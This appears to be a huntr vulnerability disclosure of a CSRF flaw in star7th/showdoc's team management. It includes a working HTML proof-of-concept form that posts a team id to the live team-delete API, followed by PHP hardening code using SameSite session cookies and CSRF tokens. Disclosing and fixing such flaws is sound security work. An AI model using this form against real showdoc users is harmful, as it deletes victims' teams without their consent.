huntr / amammad / 0AA84736-139B-4AE7-BECF-604F7F60B1C9
History: Nov 21, 2021 - 1:18 p.m.

Cross-Site Request Forgery (CSRF) in star7th/showdoc

2021-11-21 13:18:23
amammad
www.huntr.dev
10

EPSS: 0.001 (Low), Percentile: 30.5%

Description

You set the SameSite=Strict flag only on one of your cookies, named cookie_token, but in Team management an attacker can still delete or add teams through CSRF, because the cookie named PHPSESSID does not carry the Strict flag.

Proof of Concept

1. Replace 38046 with the team id.

2. Open poc.html and click on the submit button.

3. After that, the team with id 38046 (or the id you substituted) will be deleted.

//poc.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
      <input type="hidden" name="id" value="38046" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
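Why the form above is honoured and what closes the gap, as an added example that is not showdoc's own code: PHP's default session cookie beside one issued with SameSite=Strict, plus a synchronizer-token check on the team-delete handler. The function names and the commented-out data-layer call are hypothetical.

```php
<?php
// Added example (not showdoc's own code). Assumes the session cookie is set through
// PHP's session machinery and the delete handler reads the team id from POST.

// Weak: the default session cookie carries no SameSite attribute, so the browser
// attaches PHPSESSID to the cross-site POST from poc.html. The request is then
// authenticated even though cookie_token (SameSite=Strict) is withheld.
function start_session_weak(): void {
    session_start();
}

// Hardened: PHP >= 7.3 accepts 'samesite' in the cookie params, so the session
// cookie is withheld on cross-site POSTs just as cookie_token already is.
function start_session_hardened(): void {
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    session_start();
}

// Defence in depth: a per-session synchronizer token, so a cookie that does get
// sent cannot authorise a state change on its own. Render it into the real form.
function issue_csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Team-delete handler: reject any POST without a matching token. hash_equals
// keeps the comparison constant-time.
function handle_team_delete(array $post): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !hash_equals($expected, $given)) {
        http_response_code(403);
        return false;                  // poc.html sends no token: denied
    }
    $teamId = (int)($post['id'] ?? 0);
    if ($teamId <= 0) {
        return false;
    }
    // delete_team($teamId);           // hypothetical data-layer call
    return true;
}
```

With the hardened cookie, a cross-site top-level POST arrives without PHPSESSID and is simply unauthenticated; the token check additionally covers any path where the cookie is still attached.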
